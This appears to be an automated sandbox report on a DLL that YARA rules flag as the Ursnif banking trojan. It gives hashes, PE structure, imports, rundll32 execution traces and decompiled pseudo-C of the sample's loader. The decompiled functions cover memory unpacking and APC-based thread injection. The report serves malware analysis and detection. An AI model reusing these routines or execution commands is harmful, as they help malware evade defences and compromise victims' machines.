consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, config-edge-skype.l-0007.l-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, config.edge.skype.com, afdo-tas-offload.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, l-0007.config.skype.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.470808656519418
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	c3.dll
File size:	188928
MD5:	c309ec3264c7bf7c771cca5703e841fe
SHA1:	2af04c50d324bc6f42fe9714ea89cf300471c169
SHA256:	616255c7f0697542e2a3e5e6b4834fffa5e56e7ede26612454674a9937d32a19
SHA512:	d8777b8436b00dbf0e6fc3c222ca63cc4b034886262a2950aed129b198280495e55c9ef107dff033f52c72109b28a90d28bd6ab362d98bb4037570f118d2f8ba
SSDEEP:	3072:qrvdO1LblP9WNrgFFxA9cHv3UgmvXIyLOM9LPm/wKrD3SzGamTdHJyrVoNXO47:qZgi8FTAuHPUl5SeTSnZuoN+4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.p.z...z...z.......y.......k...<...j...<...j...z.......<.......<...n.......{...............{.......{...Richz...........PE..L..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1001a61
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x56F56CBB [Fri Mar 25 16:52:11 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	41b0070c0a9513aca3e2dec57678f6a0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F634CDF2447h
call 00007F634CDF294Ch
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F634CDF2303h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F634CDF2101h
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
test byte ptr [ebp+08h], 00000001h
push esi
mov esi, ecx
mov dword ptr [esi], 0101E2F8h
je 00007F634CDF244Ch
push 0000000Ch
push esi
call 00007F634CDF241Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0101E114h]
push dword ptr [ebp+08h]
call dword ptr [0101E110h]
push C0000409h
call dword ptr [0101E118h]
push eax
call dword ptr [0101E11Ch]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F634CDFD740h
test eax, eax
je 00007F634CDF2447h
push 00000002h
pop ecx
int 29h
mov dword ptr [0102D338h], eax
mov dword ptr [0102D334h], ecx
mov dword ptr [0102D330h], edx
mov dword ptr [0102D32Ch], ebx
mov dword ptr [0102D328h], esi
mov dword ptr [0102D324h], edi
mov word ptr [0102D350h], ss
mov word ptr [0102D344h], cs
mov word ptr [eax], es

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2a380	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2a40c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40000	0x4e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x41000	0x1524	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x29660	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x296b8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e000	0x248	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1ccc6	0x1ce00	False	0.706642316017	data	6.80010328322	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1e000	0xcc9e	0xce00	False	0.591607251214	COM executable for DOS	5.46383270408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x13744	0x2400	False	0.444227430556	data	4.46433641721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids	0x3f000	0x114	0x200	False	0.29296875	data	1.47141497128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x40000	0x4e8	0x600	False	0.388671875	data	3.65070908006	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x41000	0x1524	0x1600	False	0.776278409091	data	6.55572681018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x400a0	0x2c4	data	English	United States
RT_MANIFEST	0x40368	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	VirtualProtect, SetFilePointer, CreateFileW, GetFileAttributesW, Sleep, CloseHandle, GetFileSize, DeleteCriticalSection, CreateProcessW, CreateSemaphoreW, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, GetStringTypeW, GetFileType, GetStdHandle, GetProcessHeap, LCMapStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, HeapAlloc, HeapFree, GetModuleFileNameW, GetModuleHandleExW, ExitProcess, LoadLibraryExW, GetProcAddress, FreeLibrary, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, RtlUnwind, SetLastError, GetLastError, InterlockedFlushSList, RaiseException, EncodePointer, GetModuleHandleW, GetStartupInfoW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, DecodePointer, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
ole32.dll	OleInitialize, OleUninitialize
OLEAUT32.dll	VarUI1FromDate, VarCyFromBool, VarBoolFromR8, VarBstrFromUI1, VarFormatDateTime, VarCyFromUI1, VarCyFromI4, VarDiv, VarAnd, SafeArrayPtrOfIndex, VarBoolFromR4, VarCyFromI2, VarBstrFromR8, VarCyFromStr, VarBoolFromDate, VarBoolFromI4, VarDateFromR4, VarCyFromDate, VarUI1FromI2, VarUI1FromDisp, VarUI1FromI4, VarFormat, VarBoolFromI2, SysStringByteLen, VarFormatFromTokens, SysAllocStringByteLen, VarCyFromR4, VarCyFromDisp, VarBstrFromDisp, VarDateFromDisp, VarUI1FromStr, VarBoolFromUI1, VarDateFromUI1, VarBstrFromR4, VarBoolFromCy, VarDateFromI4, VarTokenizeFormatString, VarDateFromI2, VarMonthName, VarBstrFromI4, VarAdd, DispCallFunc, VarUI1FromBool, VariantChangeTypeEx, VarR8FromBool, VarBoolFromDisp, VarBstrFromBool, VarBstrFromI2, VarBstrFromCy, VarUI1FromR8, VarDateFromStr, VarUI1FromR4, VarFormatNumber, VarFormatPercent, VarDateFromR8, VarCyFromR8, VarDateFromCy, VarBoolFromStr, VarBstrFromDate, VarFormatCurrency, VarWeekdayName, VarDateFromBool, VarUI1FromCy
oledlg.dll	OleUIUpdateLinksW, OleUIChangeIconA, OleUIPasteSpecialW, OleUIObjectPropertiesW, OleUIAddVerbMenuW

Exports

Name	Ordinal	Address
@Againkind@0	1	0x100daa0
@Consonanttime@8	2	0x100db70
@Nooncry@4	3	0x100dc90
@Westwas@4	4	0x100e6b0

Version Infos

Description	Data
LegalCopyright	Copyright 2004, Guess Over
InternalName	Law.dll
FileVersion	4.7.8.542
CompanyName	Guess Over
LegalTrademarks	Visit prove
ProductName	Visit prove
ProductVersion	4.7.8.542
FileDescription	Visit prove
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6364 Parent PID: 1228

General

Start time:	15:54:28
Start date:	07/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\c3.dll'
Imagebase:	0x390000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.878420774.0000000003119000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.560938842.0000000001080000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6376 Parent PID: 6364

General

Start time:	15:54:29
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6384 Parent PID: 6364

General

Start time:	15:54:29
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\c3.dll,@Againkind@0
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6396 Parent PID: 6376

General

Start time:	15:54:29
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.528290372.0000000002C00000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6436 Parent PID: 6364

General

Start time:	15:54:34
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\c3.dll,@Consonanttime@8
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.545943062.0000000004230000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6456 Parent PID: 6364

General

Start time:	15:54:40
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\c3.dll,@Nooncry@4
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.556982674.0000000002DC0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6364 Parent PID: 1228 loaddll32.exeCOMMON

Executed Functions

Function 6F2517A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6F2517A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6F25146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6F2515A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6F251C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6F251CA4(E6F2516EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6F251D7C(_t45,  &_v48) != 0) {
					 *0x6f2541b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x6f2541b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6F251C8F(_t50 + _t15);
				 *0x6f2541b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E6F25136A(_t44);
					goto L11;
				}
			}

0x6f2517b3
0x6f2517bc
0x6f2517c0
0x6f2518c8
0x6f2518ce
0x00000000
0x00000000
0x00000000
0x6f2517c6
0x6f2517c6
0x6f2517cb
0x6f2517d1
0x6f2517e0
0x6f2517e1
0x6f2517e4
0x6f2517e7
0x6f2517f0
0x6f2517f4
0x6f2517fa
0x6f2517fe
0x6f251805
0x00000000
0x00000000
0x6f25180b
0x6f251812
0x6f251816
0x6f2518b9
0x6f2518b9
0x6f2518c0
0x6f2518c2
0x6f2518c2
0x00000000
0x6f2518c0
0x6f25181f
0x6f251872
0x6f251872
0x6f251883
0x6f251887
0x6f2518b5
0x6f251889
0x6f25188c
0x6f251894
0x6f251898
0x6f2518a0
0x6f2518a0
0x6f2518a7
0x6f2518a7
0x00000000
0x6f251887
0x6f25182d
0x6f25186c
0x00000000
0x6f25186c
0x6f25182f
0x6f251833
0x6f25183e
0x6f251842
0x6f251864
0x6f251864
0x00000000
0x6f251864
0x6f251844
0x6f251849
0x6f251850
0x6f251855
0x00000000
0x6f251857
0x6f25185a
0x6f25185d
0x00000000
0x6f25185d

APIs

Part of subcall function 6F25146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F2517B8,747863F0,00000000), ref: 6F25147B
Part of subcall function 6F25146C: GetVersion.KERNEL32 ref: 6F25148A
Part of subcall function 6F25146C: GetCurrentProcessId.KERNEL32 ref: 6F251499
Part of subcall function 6F25146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F2514B2

GetSystemTime.KERNEL32(?,747863F0,00000000), ref: 6F2517CB
SwitchToThread.KERNEL32 ref: 6F2517D1

Part of subcall function 6F2515A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6F2515F9
Part of subcall function 6F2515A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6F2517EC), ref: 6F25168B
Part of subcall function 6F2515A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6F2516A6

Sleep.KERNELBASE(00000000,00000000), ref: 6F2517F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6F25183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6F25185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6F2516EC,?,00000000), ref: 6F25188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6F2518A0
CloseHandle.KERNEL32(00000000), ref: 6F2518A7
GetLastError.KERNEL32(6F2516EC,?,00000000), ref: 6F2518AF
GetLastError.KERNEL32 ref: 6F2518C2

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 17a82ba9deb30d0df6486a4bb9ae92c6c74302d90558842b6bc742c5c9987df2
Instruction ID: b69e7082c13fbdf9bd070d73911e011c6e70d886ef81916287f579fea1348251
Opcode Fuzzy Hash: 17a82ba9deb30d0df6486a4bb9ae92c6c74302d90558842b6bc742c5c9987df2
Instruction Fuzzy Hash: 2F318171804B1A9BE720DF658C4CA5B77EDFE86765F100A2AF460C6580E730D9B4CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F27E20C, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000007D2,00003000,00000040,000007D2,6F27DC60), ref: 6F27E2C9
VirtualAlloc.KERNEL32(00000000,000001FF,00003000,00000040,6F27DCC5), ref: 6F27E300
VirtualAlloc.KERNEL32(00000000,0000CF29,00003000,00000040), ref: 6F27E360
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F27E396
VirtualProtect.KERNEL32(6F250000,00000000,00000004,6F27E1EB), ref: 6F27E49B
VirtualProtect.KERNEL32(6F250000,00001000,00000004,6F27E1EB), ref: 6F27E4C2
VirtualProtect.KERNEL32(00000000,?,00000002,6F27E1EB), ref: 6F27E58F
VirtualProtect.KERNEL32(00000000,?,00000002,6F27E1EB,?), ref: 6F27E5E5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F27E601

Memory Dump Source

Source File: 00000000.00000002.878975805.000000006F27D000.00000040.00020000.sdmp, Offset: 6F27D000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 89be4732768a5fdfa74a40c0d296f5c4b222d702245eba6b4d295f32b631076c
Instruction ID: 11dc213945a6b27514c75e40f523ef1bb7274d0543d817c0c950f78992415988
Opcode Fuzzy Hash: 89be4732768a5fdfa74a40c0d296f5c4b222d702245eba6b4d295f32b631076c
Instruction Fuzzy Hash: 6AD16DB22006069FDB21CF94C880F9577A6FF48314B195196ED19AF7DADB70B80ECB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F251E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6f254188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6f25418c;
						if( *0x6f25418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6f254198;
								if( *0x6f254198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6f25418c);
						}
						HeapDestroy( *0x6f254190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6f254188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6f254190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6f2541b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6F251CA4(E6F251D32, E6F251EE0(_a12, 1, 0x6f254198, _t41));
							 *0x6f25418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6f251e07
0x6f251e13
0x6f251e15
0x6f251e18
0x6f251e8e
0x6f251e94
0x6f251e96
0x6f251e98
0x6f251e9e
0x6f251ea0
0x6f251ea5
0x6f251ea8
0x6f251eb3
0x6f251eb5
0x00000000
0x00000000
0x6f251eb7
0x6f251eba
0x6f251ebc
0x00000000
0x00000000
0x00000000
0x6f251ebc
0x6f251ec4
0x6f251ec4
0x6f251ed0
0x6f251ed0
0x6f251e1a
0x6f251e1b
0x6f251e3b
0x6f251e41
0x6f251e43
0x6f251e48
0x6f251e84
0x6f251e84
0x6f251e4a
0x6f251e52
0x6f251e59
0x6f251e63
0x6f251e6f
0x6f251e76
0x6f251e7b
0x6f251e80
0x00000000
0x6f251e80
0x6f251e7b
0x6f251e48
0x6f251e1b
0x6f251edd

APIs

InterlockedIncrement.KERNEL32(6F254188), ref: 6F251E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6F251E3B

Part of subcall function 6F251CA4: CreateThread.KERNELBASE ref: 6F251CBB
Part of subcall function 6F251CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F251CD0
Part of subcall function 6F251CA4: GetLastError.KERNEL32(00000000), ref: 6F251CDB
Part of subcall function 6F251CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6F251CE5
Part of subcall function 6F251CA4: CloseHandle.KERNEL32(00000000), ref: 6F251CEC
Part of subcall function 6F251CA4: SetLastError.KERNEL32(00000000), ref: 6F251CF5

InterlockedDecrement.KERNEL32(6F254188), ref: 6F251E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6F251EA8
CloseHandle.KERNEL32 ref: 6F251EC4
HeapDestroy.KERNEL32 ref: 6F251ED0

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 08ffc445b09e98901abaebe9750fc4c985a92004ca3bf78ee48198a346eccd6f
Instruction ID: 484232e61131cf30d304b07979df44bbc78230cb72e5aa98967b1edd8e2c3e45
Opcode Fuzzy Hash: 08ffc445b09e98901abaebe9750fc4c985a92004ca3bf78ee48198a346eccd6f
Instruction Fuzzy Hash: C7216D71A0071AEBCF019FA9CC89A5ABBB9FB563B6710812AF505D3580E7309DB4CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F251CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F251CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6f2541cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6f251cbb
0x6f251cc1
0x6f251cc5
0x6f251cd0
0x6f251cd8
0x6f251ce1
0x6f251ce5
0x6f251cec
0x6f251cf3
0x6f251cf5
0x6f251cfb
0x6f251cd8
0x6f251cff

APIs

CreateThread.KERNELBASE ref: 6F251CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F251CD0
GetLastError.KERNEL32(00000000), ref: 6F251CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6F251CE5
CloseHandle.KERNEL32(00000000), ref: 6F251CEC
SetLastError.KERNEL32(00000000), ref: 6F251CF5

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: cf66bec7701696b0b2c1dab7c8977c34e166aa27debf4903b82534ada93f69a5
Instruction ID: 890548389cec0daafd3e72fbf44da1d96217ec938fe4edcb33f600826be29a2b
Opcode Fuzzy Hash: cf66bec7701696b0b2c1dab7c8977c34e166aa27debf4903b82534ada93f69a5
Instruction Fuzzy Hash: 55F0FE77205B21BBDB125FA08C0DF5BBE6AFB1A762F005404F60591550C7218C39DF95

Uniqueness

Uniqueness Score: -1.00%

Function 6F2515A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6F2515A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6f2541b0;
				_t39 = E6F251A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
